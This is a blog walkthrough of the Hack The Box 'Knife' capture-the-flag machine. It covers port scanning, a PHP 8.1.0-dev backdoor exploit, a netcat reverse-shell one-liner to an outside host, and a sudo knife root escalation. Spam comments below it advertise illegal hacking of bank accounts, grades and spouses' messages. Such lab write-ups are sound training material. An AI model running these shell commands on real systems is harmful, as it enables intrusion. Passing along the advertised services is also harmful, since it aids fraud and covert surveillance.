Hack The Box Knife HTB CTF Machine Walkthrough
In this blog, we will cover the knife HTB CTF challenge that is an easy machine. It is to Capture the flag types of CTF challenge. You will get to know a lot of learning in this CTF challenge. For example, sudo rights, remote code execution, etc.
Table of Content
- Port Scanning (Nmap Tool)
- Version Enumeration (Nikto)
- Remote Code Execution (Python)
- Read (User.txt)
- Sudo Rights (NoPasswd)
- Read (root.txt)
To capture the root flag in any CTF. First, we need to know the active port in the target network. Nmap is one of the most popular port scanner tools that allows the attacker to discover all active ports in the target network. Let’s see how the Nmap tool works?
nmap -sC -sV 10.10.10.242
Here I found port 22 for SSH, 80 for HTTP are opened.
We have noticed some unusual ports. Let’s scan port 80. For that, we will use the Nikto tool. Nikto is a traditional weakness scanner tool that exists in Kali Linux. If you have no idea about the Nikto tool, then follow the below image.
nikto -h 10.10.10.242
We have found an impressive PHP Bug. It may be a remote code execution bug, no idea. To get more information about these PHP 8.1 bugs, let’s jump into google.
After a lot of research on google, we discovered a PHP 8.1.0-dev ‘User-Agentt‘ Exploit Code, which is available on exploit db. Let’s Download Exploit Code. Take a closer look at the below Image.
Let’s use Exploit code. It may ask you for the target URL, as you append the target URL in the exploit code would get a reverse shell. I think you should have a closer look at the below command.
Congrats! We’ve got terminal access to the target.
We are getting a garbage issue in this shell. Let’s take a reliable reverse shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 1234 >/tmp/f
Congrats! We have got the user.txt flag. Let’s proceed to the root flag. I notice something interesting with sudo rights.
It can run with /usr/bin/knife as a root. We would execute the following command.
sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
We executed the above command and got the root shell.
- Protected: How To Mount USB Drive in Ubuntu Linux
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
Very soon this site will be famous among all blogging and
site-building people, due to it’s fastidious articles
Simply wish to saay your article is as amazing.
The clearness in your pot is just spectacular and i can assume you’re an expert
on ths subject. Fine with your permission let me to grab your feed to keep up to date
ith forthcoming post. Thanks a million and please continue the enjoyable work.
The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, email@example.com, on whatsapp 18134211326..
Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on, Henryclarkethicalhacker@gmail.com, and you can Text/Call &WhatsApp: +1 (773)-609-2741, or +1201-430-5865, and figure out your relationship status. I wish you the best.